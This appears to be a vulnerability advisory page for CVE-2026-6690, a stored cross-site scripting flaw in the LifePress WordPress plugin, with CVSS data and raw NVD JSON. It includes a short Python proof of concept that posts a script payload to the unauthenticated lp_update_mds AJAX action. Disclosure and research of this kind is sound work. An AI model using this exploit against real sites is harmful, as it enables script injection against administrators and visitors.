Security Vulnerability Report
中文
CVE-2026-6690 CVSS 7.2 HIGH

CVE-2026-6690

Published: 2026-05-12 09:16:56
Last Modified: 2026-05-12 14:03:53
Source: [email protected]

Description

The LifePress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'n' parameter of the lp_update_mds AJAX action in all versions up to, and including, 2.2.2. This is due to the `wp_ajax_nopriv_lp_update_mds` action being registered without nonce verification or capability checks, combined with insufficient input sanitization and output escaping when the series name is rendered in the admin settings page. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

LifePress <= 2.2.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target URL (replace with actual vulnerable site) target = "http://example.com/wp-admin/admin-ajax.php" # Malicious payload to be injected # The 'n' parameter is vulnerable payload_data = { "action": "lp_update_mds", "n": "<script>alert('CVE-2026-6690 Stored XSS');</script>" } try: # Send POST request without authentication (PR:N) response = requests.post(target, data=payload_data) if response.status_code == 200: print("[+] Payload sent successfully.") print("[*] Check the admin settings page to trigger the XSS.") else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[!] An error occurred: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-6690", "sourceIdentifier": "[email protected]", "published": "2026-05-12T09:16:55.940", "lastModified": "2026-05-12T14:03:52.757", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The LifePress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'n' parameter of the lp_update_mds AJAX action in all versions up to, and including, 2.2.2. This is due to the `wp_ajax_nopriv_lp_update_mds` action being registered without nonce verification or capability checks, combined with insufficient input sanitization and output escaping when the series name is rendered in the admin settings page. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/lifepress/tags/2.2.2/includes/admin/class-admin-ajax.php#L110", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/lifepress/tags/2.2.2/includes/admin/class-admin-ajax.php#L25", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/lifepress/tags/2.2.2/includes/class-metrics.php#L355", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/4fa5b8a9-1683-4806-987d-527834f45d34?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.